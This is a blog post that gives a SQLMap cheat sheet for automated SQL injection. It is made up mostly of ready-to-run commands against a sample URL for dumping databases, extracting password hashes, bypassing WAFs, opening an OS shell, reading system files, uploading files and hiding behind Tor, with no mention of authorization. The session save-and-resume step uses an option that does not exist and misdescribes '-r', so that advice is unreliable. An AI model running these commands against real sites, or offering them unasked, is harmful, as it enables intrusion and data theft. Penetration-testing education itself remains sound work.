DEV Community

Trix Cyrus
Trix Cyrus

Posted on

SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

Author: Trix Cyrus

What is SQLMap?
SQLMap is an open-source penetration testing tool used to detect and exploit SQL injection vulnerabilities in web applications. It supports various database systems like MySQL, PostgreSQL, Oracle, Microsoft SQL Server, and more.

Basic Usage
To start with SQLMap, you can run it in its simplest form by providing the target URL:

sqlmap -u "http://example.com/index.php?id=1"
Enter fullscreen mode Exit fullscreen mode

This command scans the target URL for SQL injection vulnerabilities.

1. Detecting Vulnerabilities
Use the following options to perform a basic vulnerability scan and automatically detect SQL injection points:

sqlmap -u "http://example.com/index.php?id=1" --dbs
Enter fullscreen mode Exit fullscreen mode

--dbs: Lists all available databases on the target server if a vulnerability is found.

2. Specifying POST Requests

For targets that require a POST request (usually in login forms), you can specify the data like this:

sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"
Enter fullscreen mode Exit fullscreen mode

3. Bypassing WAFs and Filters

To evade Web Application Firewalls (WAFs), SQLMap includes payload obfuscation techniques:

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment
Enter fullscreen mode Exit fullscreen mode

--tamper: Uses tamper scripts to evade filters. Example: space2comment, charencode.

4. Extracting Databases, Tables, and Columns
To get a list of databases on the target system:

sqlmap -u "http://example.com/index.php?id=1" --dbs
Enter fullscreen mode Exit fullscreen mode

Once a database is identified, extract its tables:

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables
Enter fullscreen mode Exit fullscreen mode

To get columns from a specific table:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns
Enter fullscreen mode Exit fullscreen mode

5. Dumping Data

Dumping the contents of a table is one of the most useful features of SQLMap. For example, to dump all data from a specific table:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump
Enter fullscreen mode Exit fullscreen mode

6. Enumerating Database Users and Passwords

SQLMap can also be used to enumerate database users and even crack hashed passwords:

sqlmap -u "http://example.com/index.php?id=1" --users
sqlmap -u "http://example.com/index.php?id=1" --passwords
Enter fullscreen mode Exit fullscreen mode

7. Accessing the Operating System

In some cases, SQLMap can be used to execute commands on the operating system, especially when the database user has high-level privileges:

sqlmap -u "http://example.com/index.php?id=1" --os-shell
Enter fullscreen mode Exit fullscreen mode

This will provide an interactive shell where you can execute commands on the target system.

8. File Upload and Reading

You can also read files from the target system or upload malicious files (if permitted):

sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"
Enter fullscreen mode Exit fullscreen mode

9. Using Tor for Anonymity

To hide your identity, you can run SQLMap through the Tor network:

sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor
Enter fullscreen mode Exit fullscreen mode

--tor: Enables Tor.
--check-tor: Verifies if the connection is made through Tor.

10. Saving and Resuming Sessions

SQLMap allows you to save and resume your progress by using the --session option:

sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name
Enter fullscreen mode Exit fullscreen mode

Later, you can resume the same session by:

sqlmap -r your_session_name
Enter fullscreen mode Exit fullscreen mode

11. Verbose Mode

To see detailed information about what SQLMap is doing:

sqlmap -u "http://example.com/index.php?id=1" -v 3
Enter fullscreen mode Exit fullscreen mode

The -v option controls verbosity (levels from 0 to 6, where 6 shows all details).

  1. Automated Scans for Multiple Targets

SQLMap supports scanning multiple URLs stored in a file:

sqlmap -m urls.txt --batch
Enter fullscreen mode Exit fullscreen mode

--batch: Automatically answer all prompts with default options, useful for automated scanning.

also use --risk=3 and --level=5 to advance scanning
You can use this cheat sheet to introduce readers to the essential commands of SQLMap and help them get started with SQL injection testing.

~TrixSec

Top comments (0)